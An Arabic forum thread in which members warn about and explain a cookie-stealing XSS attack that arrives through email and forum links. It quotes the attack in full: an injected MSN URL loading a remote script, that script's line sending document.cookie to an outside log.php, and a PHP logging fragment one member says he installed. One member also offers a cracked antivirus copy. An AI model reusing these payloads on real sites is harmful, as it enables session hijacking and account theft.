أشكركم أخواني على المرور والتوضيحات التي قمتم بكتابتها
| |
أشكركم أخواني على المرور والتوضيحات التي قمتم بكتابتها
__________________
مدونتي .. دروس (PHP, JavaScript, C, Java)
برمجة وتطوير المواقع والمنتديات
اخي الكريم هذا قسم تطوير مواقع !
بارك الله فيك اخي الكريم على التنبيه والتحذير يا طيب
وها المشكلة " سرقة الايميلات " منتشرة ها اليومين واتمنى من الجميع ياخذ حذره من هذه العمليات والتي في معظمها يتم سرقة الكوكيز وبالتالي سرقة الايميلات ...
تقبل تحياتي واحترامي اخي الكريم ...
في امان الله وحفظه ...
تم دخول الموقع لتصفحه والظاهر ينقل على هذا الرابط
ممكن اي شخص يفهم لنا فكرة عمله !! يعني هل ياخذ البيانات من الكوكيز او كيف؟كود:http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.worldhell.com/vb/nice.js%3E%3C/script%3E
بالمناسبة محتوى الملف nice.js هو
كود:location.href='http://www.worldhell.com/vb/log.php?nice='+escape(document.cookie)
__________________
KadHost.Com
(document.cookie) يشفط عليك الكوكيز الي بجهازك :funny:المشاركة الأصلية كتبت بواسطة KAD
والله الحلول للمشكلة كثير مثل ماذكر الأخوان بارك الله فيهم
فكرة العمل أنه يرسل لك رسالة على البريد مثلاً ويقولك
أنقذني في واحد يبي يخترق المنتدى وماني عارف وش أسوي :nice:
وأنت مسكين تحسب أنك معتصماه وتدخل طاير تقول ( لبيه لبيه )
يوم تضغط على الرابط تدخل للمنتدى مما يكون مغير الأخ الإندكس الأساسي
ورافع إندكس فيه كود أختطاف الكوكيز :funny:
وبعدها أنت بتدور على أحد يرد لك البريد وتقول ( وامعتصماه + واسوالفاه <<== سوالف بأسم الدلع :looking: )
بس هذي هي الفكرة الكلية للعملية .. لاتفتح بريد ماتعرفة
وإذا كنت شركة لاتفتح أي موقع ماهو عميل عندك لأنه صاير تجيني رسائل
الله لايوريك كل يوم واحد مرسل من بريد مختلف الي دافع 5 آلاف ريال علشان
حل مشكلة بقاعدة والي والي .. إلخ هههههه يعني واضحة أنها لعبة
وين القاعدة الي بتتصلح بـ 5 آلاف ريال :deal: وأطرف واحد الي حسيت أنه
مرسل لي الرسالة وهو بالع كرتون تونه ههههه مرسل رسالة يقولي لو
البريد للبيع إضغط على الرابط ههههههههههههههههههههههههههههههه
المهم مابي أطول وراي شغل وفرفرة على برنامج
فمان الله الكريم
:: نصيحة مني ::
اجعل السيزون فعال لمده ساعتين فقط ...
اي رابط يجيك على الايميل لا تضغط عليه
والكود الموجود داخل nice
يسحب الكوكيز الموجود بمتصفحكمن خلال log.php
http://www.worldhell.com/vb/cool.htm
>> وهذا الدليل للي مصدقين بان الثغره تعمل
هذا بعض الكودكود PHP:if(isset($_GET['xXxXxXxXxXx'])){
$fp = fopen('xSultan.txt', 'a');
وانا ركبتة بموقعي عشان اجرب وشغاله معاي تمام التمام
تحياتي
أخوي الرجل الخارق مشكور على الموضوع
أخوي soso4design ما فيه شي أحلى من التجربه
على الاقل نوصل للاجوبه بدون ما نسأل
لكن للأسف ما وجدت السكربت
حتى أجربه بنفسي وأطلع على مقدار خطورته
فالله يجازيك بالف خير اذا ممكن تجاوبني على أسألتي :looking:
هل يشترط معرفة صاحب الموقع عنوان الايميل المستهدف ؟؟
اقصد اذا قمت انا عن طريق المنتدى بفتح رابط الصفحه الملغومه
هل بتتمكن من الدخول على ايميلي بدون معرفتك المسبقه بعنواني
من الممكن نتفادىء الرسائل الملغومه ونحظر استقبالها عن طريق الايميل
لكن الروابط في المنتديات و المواقع صعب
اعتقد غير ممكن .. بس أريد أتأكد من هذا الموضوع من شخص مجرب
__________________
شي جيد
والله مافهمت ...كثير تصير معي
لكن اروح بسرعه اسوي صفحات ريستارت لأيميل على البديل او اسوي الحركه بنفسي علشان احتفظ بالكوكيز
ولكن افضل ان تقوم بالشرح حتى نستفيد
على فكرة كيف تعرف بعد دخول الصفحة بان الكوكيز قد سُرق ؟
اذا على الشركات اسألنيبس هذي هي الفكرة الكلية للعملية .. لاتفتح بريد ماتعرفة
وإذا كنت شركة لاتفتح أي موقع ماهو عميل عندك لأنه صاير تجيني رسائل
الله لايوريك كل يوم واحد مرسل من بريد مختلف الي دافع 5 آلاف ريال علشان
حل مشكلة بقاعدة والي والي .. إلخ هههههه يعني واضحة أنها لعبة
وين القاعدة الي بتتصلح بـ 5 آلاف ريال وأطرف واحد الي حسيت أنه
مرسل لي الرسالة وهو بالع كرتون تونه ههههه مرسل رسالة يقولي لو
البريد للبيع إضغط على الرابط ههههههههههههههههههههههههههههههه
المهم مابي أطول وراي شغل وفرفرة على برنامج
فمان الله الكريم
منذ اكثر من 7 شهور بدأت المعاناه
يرسلون رسائل ولكنني لا افتحها فقط ( حذف ) !
عناوين ( مخله بالاداب ) لكي تشدني ولكن اعرف مابداخلها
واحيانا ( اريد الانتقال لديك .....و رابط الموقع ) !
لاحول ولا قوة الا بالله
الله يهديهم ,,,
اقول الله يرحم والديك خل قلوبنا على كراسيها
حلوة بيسرق ايميلي عن طريق رابط من خارج الايميل
على كذا ما عاد لك اي معلومات سريه
ما تقدر تعامل ببنوك
ولا مواقع
ولا منتديات
لان كوكيزها بيتثبت بجهازك وكل شوي واحد حاط رابط ملغوم
بعد ثق تماما بتكون بكرة بدون رابط .. يعني كود داخل صفحة يعمل بخفاااء ... ممكن اي صفحة عادية وانت منسجم وتشوف محتوياتها والهكر يتفرج بكواكيزك :nice:
عز الله ضاعت اسرارنا
روووح منتداي
وراحت عضوية سوالف <<<<<<<<<< ما جات الا بعد تعب
وراحت اسهم اعماااار خخخخخخخخخخخخخ
اه يا ليل الشقا
و عليكم السلام و رحمة الله و بركاته....
طيب لو أستعمل متصفحين .
1- الفايرفوكس لتصفح البريد و كافة المواقع يعني هنا أحتفظ بالكوكيز.
2- الاكسبلورر ما أحفظ فيه أي كوكيز أو غيره..
فهل لو قمت بطلب رابط مثل المذكور بالاكسبلورر هل يتم أيضا سرقة كوكيز الفايرفوكس ؟؟؟
لو العكس أي أستعمل الاكسبلورر فيها كوكيز و الفايرفوكس ما أستعمله إلا نادرا فهل يتم أيضا سرقة الكوكيز
حسب كلام احد الاخوان ان الثغره تم ترقيعها من الهوت ميل
والله اعلم
اتوقع الكاسبر الجديد ضدها وماتمشي عليه بس مو متأكد من هالنقطة
بالله احد اذا جربه يأكد لنا حتى نتأكد
واللي يبي النسخة +الكراك يقولي بس المهم نتأكد
__________________
سبحان الله ... اللهم اني استغفرك و اتوب الليك
سيرفرات موقعي على ليكود ويب
(document.cookie) يشفط عليك الكوكيز الي بجهازك :funny:
فكرة العمل أنه يرسل لك رسالة على البريد مثلاً ويقولك
أنقذني في واحد يبي يخترق المنتدى وماني عارف وش أسوي :nice:
وأنت مسكين تحسب أنك معتصماه وتدخل طاير تقول ( لبيه لبيه )
يوم تضغط على الرابط تدخل للمنتدى مما يكون مغير الأخ الإندكس الأساسي
ورافع إندكس فيه كود أختطاف الكوكيز :funny:
وبعدها أنت بتدور على أحد يرد لك البريد وتقول ( وامعتصماه + واسوالفاه <<== سوالف بأسم الدلع :looking: )
والله يامكثرها الرسايل وكل يوم بصيغه جديده
وايميل جديد
لا ويقول ان شاء الله يعجبك ياارب
وهو ماهو داري وين ربه
وهنا مرسل لك بيانات موقعك :funny:
بعضهم يصدق وتمشي عليه
الموضوع بسيط جدا .. ومعروف منذ الاذل ..
XSS Scripting .. ولكن طريقة التقديم مختلفة هذه المرة
الكود المستخدم في الموقع :
كود:location.href='http://www.worldhell.com/vb/log.php?nice='+escape(document.cookie)
باختصار .. ياخد جميع الكوكيز على جهازك ويوديه على ملف log.php ، ومن خلال ذلك الملف .. يقدر يخزن المتغير اللي اسمه nice في قاعدة البيانات .. في ملف او يرسلها على الايميل ..
وبعدين يركب الكوكيز على جهازه هو .. وخلاص صارت (( جميع )) عضوياتك في (( جميع )) المنتديات اللي انت مشترك فيها .. تبعه
وكمان لو مش مشدد الامان في الخيارات في الهوتميل .. بيصير تبعه ..
الله يحمينا .. ويجزاك اخي صاحب الموضوع كل خير
الواحد راح جري وعمل " prompt " من الخيارات ..
تحياتي
ضوابط المشاركة
رد مع اقتباس
